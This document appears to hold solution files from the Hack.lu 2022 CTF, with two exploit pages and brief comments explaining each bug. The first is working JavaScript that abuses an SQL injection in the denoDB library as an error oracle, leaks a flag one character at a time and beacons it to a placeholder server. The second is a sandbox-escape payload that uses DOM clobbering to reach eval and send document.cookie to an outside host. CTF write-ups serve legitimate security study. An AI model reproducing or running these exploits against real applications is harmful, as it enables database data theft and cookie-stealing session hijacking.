Hack.lu 2022 CTF solutions

foodapi-solution.html

<!--
This was an SQL injection challenge where the goal was to find a 0day in denoDB library.
The bug we found was that `?` inside column name would confuse the formatters and would insert there values. 
-->

<script>
    HOST_URL = (new URL(location)).searchParams.get('host_url') || 'https://0.0.0.0/api/food/1'
    PING_URL = 'https://server';
    let alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~';
    // alph = 'bfa';
    function m_payload(pos, char){
        const h_char = char.charCodeAt(0).toString(16);
        // error based sql injection
        // `'` in () does not throw unknown column error which was crucial part of the payload
        const payload = `\`in() UNION select 1, CASE substr(flag, ${pos}, 1) WHEN char(0x${h_char}) THEN 1 ELSE abs(-9223372036854775808) END FROM flag;`;
        // when column name contains ? then the next value will be appended to it
        // /??=` in () gets translated to: `'` in () `
        return `${HOST_URL}??=${encodeURIComponent(payload)}`;
    }

    let flag = '';

    navigator.sendBeacon(PING_URL, 'start');

    async function leak_char(pos){
        for(let c of alph){
            const x = document.createElement('script');
            x.src = m_payload(pos, c);
            document.head.appendChild(x);
            let notfound = false;
            await new Promise(resolve => {
                delete window.SqliteError;
                // If there are results the page returns an array of jsons which is valid JS
                // If not, then SqliteError is returned which is also a valid JS
                // I am defining SqliteErrorr getter to see if the script tries to access it
                Object.defineProperty(window, 'SqliteError', {
                    get: ()=>{
                        notfound = true;
                        resolve();
                    },
                    configurable: true
                });
                x.onload = resolve;
            });

            if(notfound === false){
                return c;
            }
        }
    }

    (async () => {
        for(let pos = 1; pos < 100; pos++){
            const c = await leak_char(pos);
            if(c !== undefined) {
                flag += c;
                console.log(flag);
                navigator.sendBeacon(PING_URL, flag)
            }
        }
    })();

</script>

HTPL-solution.html

<!--
This was a sandboxing challenge where the JS language is presenteded in the form of exotic, made-up language. 
It's almost properly sandboxed but there is one bug that players needed to find. 
The bug I found was to construct HTML comment (<!--) that is understood by JS and which makes it possible to ignore one semicolon 
and then to concat array expression with variable name, like $var$['eval']. To get reference to eval we used DOM clobbering
and defined <iframe name=$win$>
-->

<iframe name=$win$></iframe>
<x-program>
    <x-if>
        <x-num>1</x-num>
        <x-const>
            <x-identifier>test</x-identifier>
        
            <x-lt>
                <x-identifier>win</x-identifier>
                
                <x-not><x-dec>
                    <x-identifier>asd</x-identifier>
                </x-dec></x-not>
            </x-lt>        
        </x-const>
        <x-array>
                <x-str>eval</x-str>
        </x-array>
        <x-call>
            <x-identifier>test</x-identifier>
            <x-str>top.location='https://server/?c='+document.cookie</x-str>
        </x-call>
    </x-if>
    
</x-program>
<!-- compiles to:
const write = (s) => alert(s);
const read = (s) => prompt(s);

if(1){
const $test$=$win$<!--$asd$;
["eval"];
($test$)("alert(1337)");
};
--> 

<!-- which is equivalent to
const write = (s) => alert(s);
const read = (s) => prompt(s);

if(1){
const $test$=$win$["eval"];
($test$)("alert(1337)");
};
-->